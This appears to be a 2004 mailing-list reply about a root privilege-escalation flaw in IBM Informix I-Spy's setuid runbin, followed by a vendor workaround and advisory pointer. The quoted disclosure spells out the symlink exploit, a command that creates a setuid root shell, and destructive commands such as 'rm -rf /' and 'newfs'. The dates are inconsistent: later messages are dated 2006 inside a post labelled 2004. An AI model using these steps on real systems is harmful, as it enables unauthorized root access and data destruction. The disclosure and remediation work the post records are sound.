Re: BIG INFORMIX I-SPY SECURITY HOLE
Posted in 2004
On 2004-06-14, David Williams wrote: > Install i-spy into /opt/ispy... > you get directories /opt/ispy/bin and /opt/ispy/realbin... > and /opt/ispy/runbin which is setuid root....hmmm runbin eh? > > strings runbin shows that it calls execv()....hmmm even worse! > > ln -s /opt/ispy/bin/runbin /tmp/djw/ls > > /tmp/djw/ls > execv() of [/tmp/bin/realbin/ls] failed, errno 2 > > so it uses argv[0] to get the relative directory to use and is > fooled by links?? So running /tmp/djw/ls does an execv() of > /tmp/bin/realbin/ls and runbin is setuid root so... > > cp `whence id` /tmp/bin/realbin/ls > > /tmp/djw/ls > uid=...gid=...euid=0(root)... > ^^^^^^^^^^ > so making /tmp/bin/realbin/ls a C program which does > > - cp /bin/sh /tmp/.hacked; chown root /tmp/.hacked; chmod 4775 /tmp/.hacked > gives a root shell!! > - rm -rf / > - newfs <rootfs> > etc etc etc... > > Welcome to the sos zone..you've been hacked!! On 2006-06-22, as part of a bigger message, Jonathan Leffler wrote: > A formal response from IBM about this I-Spy problem will be > forthcoming. In the interim, the basic workaround is to remove the > SUID root privileges from $ISPY_DIR/bin/runbin and put SUID root > privileges on $ISPY_DIR/bin/realbin/ispy, but remove public execute > permission from it (only informix or root should run the daemon). > The more complete workaround will do various other bits to improve > the security, but those steps alone largely deal with problem. The > solution - a new release of I-Spy - will formalize all those steps > and add some other security checking technology like that added to > 9.40.UC3 et al. On 2006-06-30, IBM released a Support Flash with a more considered response. The flash is available at: http://www-1.ibm.com/support/docview.wss?uid=swg21172742&rs=260 The subject is 'Potential for unauthorized access to the root account in the IBM Informix I-Spy product.' It includes a script which should fix up the worst of the security problem. Since helping review the script, I've discovered that the ISPY_CONFIGFILE defaults to $ISPY_DIR/etc/isconfig -- this is not used by the script, so you need to explicitly set the ISPY_CONFIGFILE environment variable. -- Jonathan Leffler #include <disclaimer.h> Email: jleffler@earthlink.net, jleffler@us.ibm.com Guardian of DBD::Informix v2003.04 -- http://dbi.perl.org/